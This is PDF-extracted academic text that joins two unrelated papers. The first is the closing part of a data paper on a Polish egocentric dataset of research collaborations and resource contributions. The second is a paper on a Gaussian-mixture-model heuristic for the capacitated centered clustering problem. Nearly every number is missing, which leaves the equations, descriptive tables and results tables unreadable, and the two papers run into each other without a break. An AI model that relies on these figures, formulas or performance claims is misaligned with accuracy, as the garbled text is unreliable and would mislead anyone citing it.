to name up to important researchers they have collaborated with during last five years. each collaborator was discussed separately giving information about gender, scientific degree, nationality, and university department (if possible). see section . below. . during the interview a network of collaboration among collaborators mentioned in item ( ) was reconstructed using cork board, pins, and rub- ber bands. see the example in figure . cork boards were photographed and later digitized into edgelist data. see section . below. . for each collaborator, the respondents were asked about academically relevant resources he/she contributed to the collaboration and what resources were contributed by the col- laborator. interviewees were provided with a broad framework, which would help them iden- tify resources such as financial resources (e.g. funding), human resources (e.g. knowledge, skills), and social resources (e.g. collaborators). . interviews were audio-recorded and later transcribed. the text of the transcripts was analyzed using qda miner lite in order to code a product of provalis research, see https://provalisresearch. com/products/qualitative-data-analysis-software/. at https://recon-icm.github.io/reconqdata/articles/resource_ inventory.html. connections resources engaged by respondents (the egos) and their collaborators (the alters) to every col- laboration. the coding was performed by two persons. random sample of the interviews was double-checked by different researchers to ensure reliability. the data are available in table resources and described in detail below. while collaboration networks assembled from part ( ) include alter–alter ties, the data on resources from part ( ) were acquired for ego-alter dyads only. structure of the data the data are contained in three inter-related tables diagrammatically presented in figure . below we describe each table in detail. node attributes the table nodes contain information about every person in the study – all egos and all alters. it has rows and the following seven variables: • id _ interview – interview identification number. • id _ node – person identification number, unique within each interview. • is _ ego – binary variable equal to if person is the ego (respondent), otherwise. • is _ polish – binary variable equal to if person is affiliated with a polish academic in- stitution, otherwise. • department – marking scientists if they work at the same department. if department is not missing then all scientist within the same inter- view sharing the same value of department work at the same department at the same university. • scidegree – scientific degree of the scientist. one of “mgr” = ma, “dr” = phd, “drhab” = habili- tated doctor, or “prof” = full professor. • female – binary variable equal to if person is female, if male. pair of variables id _ interview and id _ node together constitutes a key uniquely identifying each row in the nodes table. collaboration networks the table collaboration is essentially an edge list of collaboration ties. it has , rows and the following three variables: • id _ interview – interview identification number. figure : using cork board, pins, and rubber bands to collect data on collaborations. small cards contained names or nicknames which have been masked. figure : the data consist of three interrelated tables. table ‘nodes’ contains information about all persons. table ‘collaboration’ is an edgelist of collaboration ties. table ‘resources’ is a multiplex edgelist of resource flows. academic collaboration via resource contributions: an egocentric dataset • from and two – person identification numbers referencing the id _ node variable from the nodes table. in other words, a row consisting of values, say, id _ interview = , from = , to = indicates that researchers and where reported as collaborating in the interview . resource contributions data about resources engaged by respondents (egos) and their collaborators (alters) to every collaboration were coded based on transcripts. the data are provided in table resources having , rows and the following four columns: • id _ interview – interview identification number. • from and two – person identification numbers (within each interview) referencing the id _ node variable from the nodes table. • code – a textual code identifying type of re- source contributed by researcher from into the collaboration with researcher to. resources engaged in collaborations (variable code) were coded with a coding scheme covering different elements of a research process in different disciplines. the scheme consists of codes such as: • ‘conceptualisation’ – coming up with an idea for a study, providing general theoretical framework; designing a general framework for a study. • ‘methodology’ – designing methodology for a study. • ‘investigation’ – conducting research, gather- ing data. • ‘data analysis’ – data analysis, quantitative as well as qualitative. • ‘data curation’ – managing and archiving data. • ‘software creation’ – writing software for re- search process. • ‘prototype construction’ – building a proto- type that is used in research process. complete list of codes together with examples of coded interview fragments is available at the website. table . frequencies of gender and scientific degree for egos and alters. symbol ‘–’(dash) corresponds to missing data. gender degree alter ego female full professor female habilitated phd female ma female phd male full professor male habilitated phd male ma male phd – ma – – phd – – – – selected descriptives as a glimpse into the data, table shows frequency distribution of gender and scientific degree for egos and alters separately. figure shows resource flow networks from one of the interviews: accessing the data the data are available in a github repository at https://recon-icm.github.io/reconqdata as an r package with accessible files in a csv format. users can use the data with r by installing the package or download the data files in csv format using urls provided in the readme file. discussion we close by discussing potential uses and limitations of the documented data set. we think that the data we share can be used in several contexts with substantive and methodological goals in mind. on the substantive side, the data can be used to address several research questions. for example to analyze co-appearance of different types of resources in collaboration ties – certain https://recon-icm.github.io/reconqdata/articles/resource_ inventory.html. connections figure : collaboration (dashed, undirected) and resource flow (solid, directed) ties from one of the interviews. types of resources tend to be contributed together. further, the resource catalog could be improved and perhaps serve as a starting point for constructing a more standardized survey instrument. on the methodological side, the value of the data set is that it is egocentric and multiplex at the same time. we see active development in statistical models for data collected through egocentric design (krivitsky and morris, ) as well as in modeling multilayer networks (krivitsky et al., ). the data we share can be a useful test bed for such models. the data have certain limitations. first, it comes from a qualitative study conducted on a quota sample. the obvious limitation is the lack of representativeness in the strict statistical sense. nevertheless, it is representative in the loose sense – the respondents come from universities from different regions and of different size, from different disciplines and at different stages of scientific career. we believe it does cover the diversity of scientific positions pretty well. second, the data contain several instances of resource flows between the alters. however, the reliability of this data is rather low. majority of respondents did not have enough information or were otherwise not confident enough in reporting the resource contributions. consequently, these data were not collected systematically. acknowledgments the authors thank (polish) national science cen- tre for support through sonata grant / /d/ hs / for the project dynamics of competition and collaboration in science: individual strategies, collaboration networks, and organizational hierar- chies (http://recon.icm.edu.pl). references bojanowski, m. and czerniawska, d. . reaching for unique resources: structural holes and specialization in scientific collaboration networks. journal of social structure. forthcoming. preprint available on-line, available at: http://recon.icm.edu.pl/ wp-content/uploads/ / /exchange_networks.pdf. academic collaboration via resource contributions: an egocentric dataset coleman, j. s. . foundations of social theory, harvard university press, cambridge, ma. czerniawska, d. . sieci współpracy i wymiany w centrach i na peryferiach. przypadek polskiej nauki (phd thesis). university of warsaw, warsaw, poland. czerniawska, d., fenrich, w. and bojanowski, m. . actors, relations, and networks: scholarly collaboration beyond bibliometric measures. polish sociological review, : – . krivitsky, p. n. and morris, m. . inference for social network models from egocentrically sampled data, with application to understanding persistent racial disparities in hiv prevalence in the us. the annals of applied statistics, ( ): – . krivitsky, p. n., koehly, l. m. and marcum, c. s. . exponential-family random graph models for multi-layer networks. socarxiv, available at: https://doi.org/ . / osf.io/dqe b (accessed august , ). kwiek, m. . changing european academics: a comparative study of social stratification, work patterns and research productivity. routledge, london. kwiek, m. and szadkowski, k. . higher education systems and institutions, poland. in teixeira, p., shin, j. c., amaral, a., bernasconi, a., magalhaes, a., kehm, b. m. and nokkala, t. (eds), encyclopedia of international higher education systems and institutions, springer, pp. – , available at: https://doi.org/ . / - - - - _ - . laudel, g. . collaboration, creativity and rewards: why and how scientists collaborate. international journal of technology management, ( – ): – . lewis, j. m., ross, s. and holden, t. . the how and why of academic collaboration: disciplinary differences and policy implications. higher education, ( ): – . leydesdorff, l., wagner, c., park, h. w. and adams, j. . international collaboration in science: the global map and the network, available at: http:// arxiv.org/abs/ . (accessed august , ). moody, j. . the structure of a social science collaboration network: disciplinary cohesion from to . american sociological review, ( ): – . oecd. . oecd science, technology and r&d statistics: main science and technology indicators, available at: https://data.oecd.org (accessed august , ). qin, j., lancaster, f. w. and allen, b. . types and levels of collaboration in interdisciplinary research in the sciences. journal of the american society for information science, ( ): – . solution strategy based on gaussian mixture models and dispersion reduction for the capacitated centered clustering problem solution strategy based on gaussian mixture models and dispersion reduction for the capacitated centered clustering problem santiago-omar caballero-morales postgraduate department of logistics and supply chain management, universidad popular autonóma del estado de puebla, puebla, puebla, mexico abstract the capacitated centered clustering problem (cccp)—a multi-facility location model—is very important within the logistics and supply chain management fields due to its impact on industrial transportation and distribution. however, solving the cccp is a challenging task due to its computational complexity. in this work, a strategy based on gaussian mixture models (gmms) and dispersion reduction is presented to obtain the most likely locations of facilities for sets of client points considering their distribution patterns. experiments performed on large cccp instances, and considering updated best-known solutions, led to estimate the performance of the gmms approach, termed as dispersion reduction gmms, with a mean error gap smaller than . %. this result is more competitive when compared to variable neighborhood search, simulated annealing, genetic algorithm and ckmeans and faster to achieve when compared to the best-known solutions obtained by tabu-search and clustering search. subjects algorithms and analysis of algorithms, data mining and machine learning, optimization theory and computation keywords capacitated centered clustering problem, gaussian mixture models, dispersion reduction, expectation-maximization introduction facilities are very important infrastructure within the supply chain as they support production, distribution and warehousing. due to this, many operative processes associated to facilities are subject to optimization. fields such as facility layout planning are crucial for smooth material handling and production flow (mohamadghasemi & hadi-vencheh, , hadi-vencheh & mohamadghasemi, ; niroomand et al., ). on the other hand, where to locate facilities within specific regions is a central problem for strategic decisions of transportation and distribution (chaves, correa & lorena, ). this is because the distance between the facilities and the customers (demand or client points) is crucial to provide efficient transportation and distribution services. within this context, the capacitated centered clustering problem (cccp) is one of the best-known and most challenging multi-facility location (mfl) problems in the fields of operations research, logistics and supply chain management (chaves & nogueira-lorena, , mahmoodi-darani et al., ). the cccp is focused on determining clusters or how to cite this article caballero-morales s-o. . solution strategy based on gaussian mixture models and dispersion reduction for the capacitated centered clustering problem. peerj comput. sci. :e doi . /peerj-cs. submitted june accepted november published february corresponding author santiago-omar caballero-morales, santiagoomar.caballero@upaep.mx academic editor angelo ciaramella additional information and declarations can be found on page doi . /peerj-cs. copyright caballero-morales distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:santiagoomar.�caballero@�upaep.�mx https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ groups of demand or client points which can lead to minimum average distances to their centroids (where facilities are to be located). the cumulative demand of the client points assigned to a cluster cannot exceed the capacity of the facility located at its centroid (chaves & nogueira-lorena, ; chaves & nogueira-lorena, ; negreiros & palhano, ). the mathematical formulation of the cccp is presented as follows (chaves & nogueira-lorena, ; negreiros & palhano, ): min x i i x k k xi �mkk k yik ( ) subject to x k k yik ¼ i i ( ) x i i yik ¼ nk k k ( ) x i i xiyik � nkmk k k ( ) x i i diyik � ck k k: ( ) mk <l; nk n; yik f ; g i i; k k ( ) where (a) i is the set of all demand points or clients (n = number of points); (b) k is the set of clusters (group of clients assigned to a facility) with |k| = number of facilities; (c) xi is the geometric position of the i-th point in the <l space (l = for a two-dimensional space and xi = cxi cyi½ � where cxi is the x-coordinate and cyi is the y-coordinate of xi); (d) mk is the geometric position of the centroid of a cluster k (i.e., the location of the k-th facility, and if l = , mk = cxk cyk½ � where cxk is the x-coordinate and cyk is the y-coordinate of mk); (e) yik = if the point i is assigned to cluster k and yik = otherwise; (f) nk is the number of points in the cluster k; (g) di is the demand of the point i; and (h) ck is the capacity of each cluster k. in this formulation eq. ( ) defines the non-linear objective function which consists on minimizing the total distance between each point and the centroid of the cluster where the point is assigned. as mentioned in chaves & nogueira-lorena ( ) the geometric position of the centroid depends on the points that compose the cluster. equations ( ) and ( ) are restrictions that define that each point is only assigned to one cluster and provides the number of points in each cluster respectively. equation ( ) is the restriction that locates the centroid of each cluster at its geometric center while eq. ( ) is the restriction that defines that the total demands of the points assigned to a cluster k must not exceed its capacity. finally, eq. ( ) define the nature of mk, the decision variable yik and the upper limits for the number of individuals or points per cluster (nk). nk is obtained from the values of the decision variables yik as these determine the number of points to be assigned at each cluster (i.e., if for k = the optimal solution is y , = y , = y , = , then n = ). this is explained in more detail in section “standard em algorithm”. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the cccp has been approached with different solving methods (particularly meta-heuristics) due to its combinatorial nature and np-hard computational complexity (hence, it is difficult to solve it with exact methods) (chaves, correa & lorena, ; chaves & nogueira-lorena, ; herda, ; negreiros & palhano, ). while there are works reported in the literature that have achieved very competitive results for small, medium and large instances of the cccp, their performance is dependent of the size or scale of the instances. in this work the technique of gaussian mixture models (gmms) is proposed to estimate clusters of maximum probability in order to provide feasible solutions for large instances of the cccp (n > , points). this is accomplished by the meta-heuristic termed as dispersion reduction gmms (drg) which integrates the following algorithms: � an adapted expectation-maximization (em) algorithm to estimate the parameters of gmms and generate clusters of points of maximum likelihood with the capacity requirements of the cccp; � a dispersion reduction algorithm to compress large cccp data and achieve near optimal results within faster computational times. both, the application of the gmms and the validity of the em algorithm for the cccp, have not been explored in previous works. experiments of the drg on large instances of the cccp considering the benchmarks of the clustering search (cs) algorithm (de-oliveira, chaves & nogueira-lorena, ) and tabu-search (ts) (fernandes- muritiba et al., ) led to a mean error less than . %. in general, the drg algorithm performed better than variable neighborhood search (vns), simulated annealing (sa), genetic algorithms (ga) and ckmeans (ckm). the advances of the present work can provide a better understanding of gaussian modeling and the em algorithm for their application in facility location problems. the contributions of this paper are presented as follows: first, in section “clustering” an overview of clustering and the mathematical foundations of gmms are presented. also, the findings regarding the specific dispersion reduction process required by cccp data in order to make it suitable for the em algorithm are presented and discussed. then, in section “drg meta-heuristic” the details of the drg meta-heuristic are presented while the results regarding its performance are discussed in section “results and assessment”. finally, conclusions and improvement recommendations are discussed in section “conclusions and future work”. clustering most of the solving algorithms for the cccp perform clustering within the search process for initial partitioning of the set of demand points. this partitioning is then improved by exchanging certain points between the most promising partitions or clusters (hansen & jaumard, ; negreiros & palhano, ). formally, clustering involves the grouping of data points in a way that homogeneity of points within a group, and the heterogeneity of points between groups, are maximized (chaves & nogueira-lorena, ; negreiros & palhano, ). for the cccp the technique used for clustering has an important role in the quality of the solutions, which caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ may lead to significant differences from best-known results (i.e., errors from to . % (radiah, hasnah & omar, ) to % (negreiros & palhano, )). gaussian mixture models gaussian mixture models (gmms) have been widely studied for data modeling within the field of pattern classification based on bayes decision theory (theodoridis & koutroumbas, ). for more accurate modeling of multi-dimensional patterns a mixture of gaussian distributions can be used. each mixture component is defined by two main parameters: a mean vector and a covariance matrix (forsyth, ; theodoridis & koutroumbas, ; theodoridis & koutroumbas, ). within this context, “clusters” can be characterized by each gaussian component (mixture) which can model sub-sets of the whole set of patterns with maximum likelihood. there are important differences between clustering that can be obtained with gmms and centroid-based clustering techniques (such as k-means or k-nearest neighbors). the following can be mentioned: � over-fitting (e.g., the model “overreacts” to minor fluctuations in the training data for prediction purposes) can be avoided with gaussian distribution-based clustering. � clusters defined with gaussian distributions can have different shapes and sizes. by contrast, centroid-based clustering algorithms tend to find clusters of comparable size of (more or less) symmetrical shape (mohammed, badruddin & mohammed, ). � at each iteration, gaussian distribution-based clustering performs, for a given point, a “soft-assignment” to a particular cluster (there is a degree of uncertainty regarding the assignment). the centroid-based clustering performs a hard-assignment (or direct assignment) where a given point is assigned to a particular cluster and there is no uncertainty. due to these differences, the gmm-based clustering was considered as an alternative to generate feasible solutions for the cccp. in terms of the cccp formulation described in section “introduction” a cluster can be modeled by a single gaussian probability density function (pdf). hence, the location “patterns” of a set of clients x can be modeled by a mixture of k gaussian pdfs where each pdf models a single cluster. if the set contains n clients, then x ¼ xi¼ ; xi¼ ; …; xi¼n½ � and the mixture can be expressed as: pðxÞ¼ xk k¼ pkpðxjkÞ¼ xk k¼ pknðxjmk; skÞ; ( ) where k = ,…, k and |k| = p is the number of gaussian pdfs, p(x | k) represents the probabilities of each gaussian pdf describing the set of clients x (theodoridis & koutroumbas, ) and pk is the weight associated to each gaussian pdf (hence,pk k¼ pk = . ). each gaussian component can be expressed as: pðxjkÞ¼nðxjmk; skÞ¼ ffiffiffiffiffiffiffiffiffiffiffiffi pjskj p e� ðx �mkÞts� k ðx �mkÞ k k; ( ) caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ where mk is the mean vector and sk is the covariance matrix of the k-th gaussian pdf or k- th cluster. note that mk and each element of x (i.e., any xi) must have the same size or dimension which is defined by l (in this case, l = because each point consists of a x-coordinate and a y-coordinate). finally, sk is a matrix of size l × l. for clustering purposes, mk can model the mean vector of a sub-set of points in x which is more likely to be described by the gaussian pdf k as estimated by eq. ( ). if the points in this sub-set of x are clustered, then mk can represent the “centroid” of the cluster k and sk can model the size and shape of the cluster k (bishop, ; theodoridis & koutroumbas, ). observe that x − mk defines a distance or difference between each point in x and the centroid (located at mk) of each cluster k. thus, the estimation of probabilities considers the distance between each point xi and each cluster k. the parameters of the gaussian pdfs (pk, mk and sk) that best model (describe) each sub-set of the whole pattern x can be estimated by the iterative algorithm of expectation-maximization (em) (bishop, ; theodoridis & koutroumbas, ). the advantage of this gaussian approach for clustering is that faster inference about the points xi that belong to a specific cluster k may be obtained considering all points. in this context, it is important to mention that due to the probabilistic nature of the inference process, a single point xi is not directly assigned to a specific cluster (as it is required by the cccp) because all points have probabilities associated to all clusters (i.e., “soft- assignment”). also, this approach does not consider the capacity of each cluster and the demand associated to each client point. thus, restrictions about the quantity of points xi associated to each cluster are not integrated in this algorithm. in order to consider these requirements and restrictions a modification on the em algorithm was performed. this is described in the following sections. dispersion reduction in gmms performance for the cccp capacitated centered clustering problem data, which consists of x and y coordinates, represents a particular challenge for gmms. this is because the values of coordinates can affect the computation of the exponential element of eq. ( ). also, dispersion of data may affect convergence of the em algorithm for pk, mk and sk. thus, specific re-scaling or coding of cccp data was required to reduce the effect of dispersion and coordinates’ values on the computations of gmms. in order to reduce dispersion of the cccp data the compression algorithm presented in fig. was performed. it is important to mention that compression is only performed on the coordinates’ values, and not on the number of data points (thus, the size of the instance remains the same). as presented, the original x–y coordinates were replaced by their unique indexes. this led to elimination of empty spaces between data points. coding of the compressed data was performed within the interval ; ½ � as presented in fig. . this coding made the compressed data more suitable for fast computation of eq. ( ). caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ an important issue regarding the use of gmms for the cccp is the restriction on the number of gaussian components. in this regard, extensive research has been performed to determine the most suitable number of gaussian components for different sets of data (mclachlan & rathnayake, ). however, available research does not consider the capacity aspect of clustering which is the main feature of cccp data. nevertheless, a restriction on the number of gaussian components must be considered because, as discussed in fraley & raftery ( ), the em algorithm may not be suitable for cases with very large numbers of components. due to this situation a maximum number of gaussian components was considered. this restriction was based on the doni database, which has some of the cccp instances with the largest number of client points (fernandes-muritiba et al., ) (i.e., n = , client points with p = facilities). a discussion on future extensions for the gaussian approach and the em algorithm to address larger number of components is presented in the final section. drg meta-heuristic standard em algorithm figure presents the structure of the standard em algorithm (bishop, ; theodoridis & koutroumbas, ; theodoridis & koutroumbas, ) considering the variables defined by eqs. ( ) and ( ). in this case, x represents the array of compressed and coded x − y coordinates of all points xi (the array structures presented in figs. and follow the em formulation described in theodoridis & koutroumbas ( )). original coordinates unique x-coordinates = [ , , ] index i = , , unique y-coordinates = [ , , , ] index j = , , , compressed coordinates i j coded coordinates . . . . . . . . i/maxi j/maxj . . . . . . . maxi = maxj= figure cccp data compression and coding algorithm (dispersion reduction algorithm). full-size doi: . /peerj-cs. /fig- caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ as presented in fig. , the locations of the n clients are stored into the array x which consists of a matrix of dimension l × n where: (a) n is the number of client points, and (b) l = as each column vector of x consists of the values cxi and cyi that identify the compressed and coded x − y coordinates of the client point xi where i = ,…, n. the em algorithm starts with initial values for mk, sk and pk. values for mk and sk were randomly generated as follows: mk ¼ h randomðcxmin; cxmaxÞ; randomðcymin; cymaxÞ it k k; ( ) sk ¼ randomð : ; : Þ� il k k; ( ) where (cxmin, cxmax) and (cymin, cymax) are the minimum and maximum values throughout all compressed and coded x and y coordinates respectively, and il is the identity matrix of size l × l. figure structure of the standard expectation-maximization (em) algorithm. full-size doi: . /peerj-cs. /fig- caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for pk a lower bound for k was obtained by considering the total demand of the points xi and the capacity of the clusters ck. because all clusters have the same capacity, ck = c. then, k and pk were obtained as follows: k ¼ pn i¼ di c ; ( ) pk ¼ jkj k k: ( ) the stage of expectation starts with these initial values for mk, sk and pk. an initial computation of assignment or “responsibility” scores γ (zik) is performed to determine which xi is more likely to be associated to a particular cluster (and thus, to belong to this cluster) with parameters mk, sk and pk (bishop, ). observe that, as presented in fig. (step ), γ (zik) is computed by means of eq. ( ). these scores can lead to provide values for the decision variable yik of the cccp objective function (see eq. ( )). this process will be discussed in the following section. then, the stage of maximization integrates the scores γ (zik) into the re-estimation of the cluster’s parameters which leads to mnewk , s new k and p new k . convergence is achieved if the total error or absolute difference between the previous and new estimates is less than a given threshold e (in this case, e= . ). if convergence is not achieved, then mk mnewk , sk snewk and pk pnewk . modified em algorithm with direct assignment and capacity restrictions as discussed in section “gaussian mixture models” the advantage of the gmms approach is that faster inference about the points xi that belong to a specific cluster k can be obtained. this inference is performed based on the probabilities defined by eq. ( ) where the figure assignment of values for yik from the scores of γ(zik). full-size doi: . /peerj-cs. /fig- caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ parameters of the gaussian pdfs are estimated with the standard em algorithm. however under this approach a single point xi is not directly assigned to a specific cluster (as it is required by the cccp) because all points have probabilities associated to all clusters (i.e., “soft-assignment”). also, while the standard em algorithm can determine the most likely sub-sets of client points in x to be covered by each cluster k, these sub-sets are not restricted by the capacity of the cluster and the demand of each assigned client point. hence, the standard em algorithm was modified in order to comply with the requirements and restrictions of the cccp. as previously mentioned, the score γ (zik) computed in step of the em algorithm (see fig. ) represents the likelihood or responsibility of the cluster k on the generation of the point xi (bishop, ). as presented in fig. all scores are stored into a matrix γ of dimension k × n, where each column vector cðzi Þ; …; cðzikÞ½ �t contains the assignment scores of the point xi to all clusters (thus, pk k¼ cðzikÞ¼ : i n). these scores represent the basis for defining the decision variable yik. from section “introduction” it was explained that yik = if the point xi is assigned to cluster k and yik = otherwise (each point xi can be assigned to only one cluster). based on the scores of γ (zik) it was determined that for each vector xi the cluster assignment would be defined by the cluster k with maximum γ(zik) value. if two or more clusters share the same maximum likelihood, then one of them is randomly assigned. an example of this assignment process is presented in fig. . by determining the unique assignment of each point xi to each cluster k at step of the em algorithm (see fig. ), the number of points assigned to each cluster is obtained. this leads to determine the cumulative demand of the points assigned to each cluster. this information is stored into the vector: demands ¼ d ; d ; …; dk½ �; ( ) where dk represents the cumulative demand of the points assigned to cluster k and it must satisfy dk ≤ ck. this vector is important to comply with the capacity restrictions because it was found that homogenization of the cumulative demands dk contributes to this objective. homogenization is achieved by minimizing the coefficient of variation between all cumulative demands: min cv ¼ standard deviationðdemandsÞ meanðdemandsÞ : ( ) the objective function defined by eq. ( ) is integrated within the evaluation step of the standard em algorithm (see step of fig. ). this leads to the modified em algorithm with capacity restrictions where convergence is based on two objectives: � minimization of the error (less than a threshold of e = . ) between the estimates of mk, pk and sk; � minimization of the coefficient of variation of demands. an important issue regarding the minimization of cv is that there is the possibility that min cv may not lead to comply the condition dk ≤ ck for all clusters k. this was addressed caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ by the following strategy: if min cv leads to a cluster k where the condition dk ≤ ck is not complied, then the farthest assigned points are re-assigned to other clusters with closer centroids and available capacity. figure presents an example of the clustering achieved without and with the objective function defined by eq. ( ). as presented, the clusters are more accurately defined with the integration of eq. ( ). also, clusters comply with the capacity restrictions of the cccp. it is important to remember that the proposed drg meta-heuristic consists of the modified em algorithm which provides the cluster assignation for each point xi considering compressed and coded cccp data. thus, fig. presents the decoded and uncompressed points xi (i.e., original cxi and cyi coordinates) assigned to each cluster based on the assignments of the drg meta-heuristic with the modified em algorithm on compressed and coded data. further improvement of the assignments and the centroids at mk are achieved by a greedy algorithm that verifies that all points xi are assigned to the closest cluster. this leads to additional exchange and insertion/deletion of complying client points xi between clusters. these operations must comply with the capacity restrictions of each cluster. the assignments are updated if the insertion/deletion is valid. this leads to re-estimation of the locations of the mk centroids. results and assessment implementation of the drgmms meta-heuristic was performed with the software matlab on a laptop computer with the following hardware: intel core i - u cpu at . ghz with gb ram. for testing purposes the libraries presented in table were considered. for comparison purposes the methods and best-known results presented in chaves & nogueira-lorena ( ), chaves & nogueira-lorena ( ), fernandes-muritiba et al. ( ), de-oliveira, chaves & nogueira-lorena ( ), negreiros & palhano ( ), (a) centroid ( ) of cluster k centroid ( ) of cluster k (b) figure clustering with (a) standard em algorithm and (b) drg meta-heuristic (modified em algorithm with decoded and uncompressed cccp data). full-size doi: . /peerj-cs. /fig- caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ palhano, negreiros & laporte ( ) and pereira & senne ( ) for the cccp were considered. these methods are the following: � best-known solutions�. the benchmarks reported in de-oliveira, chaves & nogueira- lorena ( ) have been used for the assessment of the most efficient methods for the cccp. for this work, these benchmarks were updated with the best-known results obtained with ts (fernandes-muritiba et al., ) which is considered as the current state of the art algorithm for the cccp (carvalho, mendes & azeredo-chaves, ; pereira & carvalho, ). � clustering search (cs). hybrid method which combines meta-heuristics and local search heuristics in which the search is intensified only in areas of the search space that deserve special attention (promising regions). the main idea of cs is to identify promising areas of the search space by generating solutions through a meta-heuristic and “clustering” them into groups that are further explored with local search heuristics (chaves & nogueira-lorena, ; chaves & nogueira-lorena, ; de-oliveira, chaves & nogueira-lorena, ). the results reported in de-oliveira, chaves & nogueira-lorena ( ) were considered for comparison with drg. � a two-phase heuristic using vns. the results reported in negreiros & palhano ( ) were considered for comparison with drg. these results were also reviewed by fernandes-muritiba et al. ( ) for comparison with ts. table libraries of cccp instances considered for testing and assessment. instance n k doni , doni , doni , doni , doni , doni , doni , sjc sjc sjc a sjc a ta ta ta ta ta ta ta caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � ckmeans (ckm). the results reported in palhano, negreiros & laporte ( ) were considered for comparison with drg. these results were also reviewed by chaves & nogueira-lorena ( ) for comparison with ga. � two-column generation (tcg). the results reported in pereira & senne ( ) were considered for comparison with drg. � simulated annealing (sa) and genetic algorithm (ga). cs performs a clustering strategy on solutions generated by a meta-heuristic, and the research in chaves & nogueira-lorena ( , ) reported the comparison of results of the cs method with the sa and ga meta-heuristics respectively. for assessment purposes, (chaves & nogueira-lorena, , ) also reported the comparison of results of sa and ga without the cs strategy (e.g., independent performance of sa and ga). these independent results were considered for comparison with drg. � tabu-search (ts). the ts algorithm reported in fernandes-muritiba et al. ( ) is currently considered state of the art by rodrigo de carvalho et al. for the cccp (carvalho, mendes & azeredo-chaves, ; pereira & carvalho, ). the results reported in fernandes-muritiba et al. ( ) were considered for comparison with drg. in order to compute the error, gap or deviation from the updated best-known solutions the error metric presented by yousefikhoshbakht & khorram ( ) was considered: errorð%Þ¼ � a�b b � � ; ( ) where a is the cost or distance of the best solution found by the algorithm for a given instance while b is the best known solution for the same instance. in this case it is important to mention that the best-known solution is not necessarily the optimal solution due to the np-hard complexity of the cccp. initially, this metric was computed for the drg, vns, sa, cs, ts and ga methods because the reference data was available for all sets of instances. drg vs. vns-sa-cs-ts-ga table presents the best results of the drg meta-heuristic for the considered instances. information regarding the runs performed by each method to report the best result is also presented when available. also, information regarding the programing language and the hardware used by the authors of the reviewed methods were also included. as reported in the literature, cs and ts are the most competitive methods to solve the cccp with a mean error gap of . % and . % respectively (and thus, were considered to update the benchmark solutions). then, the proposed drg meta-heuristic stands as the next most competitive method with a mean error gap of . %. the vns, sa and ga methods show a more significant mean error gap with . %, . % and . % respectively. also, vns, sa and ga show a higher variability in performance which is characterized by an increased standard deviation when compared with their mean error gap. the drg shows a balanced mean and standard deviation, thus its performance is more robust and consistent through all different cccp instances. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ drg vs. ckm-tcg tables and present the results of the drg meta-heuristic for the instances where reference data of the ckm and tcg methods were available. as presented in table , the drg meta-heuristic is more competitive than the ckm method. also, as previously observed, the drg is more consistent. when compared to the tcg method, this is more competitive than the drg approach even though the error gaps are minimal (less than . %). error and speed vs. size of the instance figure presents the graphical review of the error gaps of all methods based on the size of the test instance. ts and cs are located on the x-axis as they are the benchmark methods. it can be observed that, as the size of the instance increases, the error gap of sa, ga and vns significantly increases. tcg presents very small error gaps with small instances (less than , points) and ckm reports error gaps comparable to sa for small-medium size instances (less than , points). in contrast, drg performs consistently through all instances, decreasing its error gap as the instance grows from medium to large size (up to , points). table performance of drg, vns, sa, cs, ts and ga on cccp instances when compared to updated best-known solutions*: (a) matlab, intel core i at . ghz and gb ram, (b) amd athlon at . ghz and mb ram, (c) c++, pentium at . ghz, (d) c++, pentium at . ghz, (e) c++, intel core quad q cpu at . ghz and gb ram, (f) c++, pentium at . ghz. instance best known* n k drg (a) ( runs) error (%) vns (b) error (%) sa (c) ( runs) error (%) cs (d) ( runs) error (%) ts (e) ( runs) error (%) ga (f) ( runs) error (%) ta , . , . . , . . , . . , . . , . . , . . ta , . , . . , . . , . . , . . , . . , . . ta , . , . . , . . , . . , . . , . . , . . ta , . , . . , . . , . . , . . , . . , . . ta , . , . . , . . , . . , . . , . . , . . ta , . , . . , . . , . . , . . , . . , . . ta , . , . . , . . , . . , . . , . . , . . sjc , . , . . , . . , . . , . . , . . , . . sjc , . , . . , . . , . . , . . , . . , . . sjc a , . , . . , . . , . . , . . , . . , . . sjc a , . , . . , . . , . . , . . , . . , . . doni , . , , . . , . . , . . , . . , . . , . . doni , . , , . . , . . , . . , . . , . . , . . doni , . , , . . , . . , . . , . . , . . , . . doni , . , , . . , . . , . . , . . , . . , . . doni , . , , . . , . . , . . , . . , . . , . . doni , . , , . . , . . , . . , . . , . . , . . doni , . , , . . , . . , . . , . . , . . , . . mean= . mean= . mean= . mean= . mean= . mean= . stddev= . stddev= . stddev= . stddev= . stddev= . stddev= . caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ regarding speed, fig. presents the computational (running) times 